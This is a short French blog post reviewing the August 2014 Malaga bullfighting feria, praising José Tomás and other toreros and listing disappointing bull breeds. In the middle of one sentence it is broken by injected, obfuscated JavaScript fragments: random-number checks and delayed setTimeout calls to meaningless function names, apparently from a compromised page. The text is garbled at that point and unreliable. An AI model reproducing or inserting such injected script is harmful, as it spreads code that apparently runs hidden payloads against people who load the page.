BILAN DE MALAGA AOUT 2014

José Tomàs a décroché le prix de la meilleure faena à la dernière feria de Malaga. Logique, le torero de Galapagar a triomphé lors de la corrida de clôture, obtenant trois oreilles, dont deux du dernier toro (un exemplaire de Parlade annoncé à 596 kilos).

Inutile des qualificatifs, José Tomàs est hors du commun, n’en déplaise à certains. De cette bonne feria de Malaga, on soulignera l’excellentissime faena de Morante de la Puebla le vendredi, l’implacabla technique de Miguel Angel Perera qui marche sur l’eau et l »immense progression d’Alejandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andro Talavante métamorphosé.

Dommage qu'à l'exception de Nîmes aux Vendanges, aucune arène française ne l'ait programmé. Au chapitre des déceptions, les toros de Miura insipides, ceux de Victorino Martin sans saveur et les novillos de Fuente Rey à oublier bien vite.

Les commentaires sont fermés.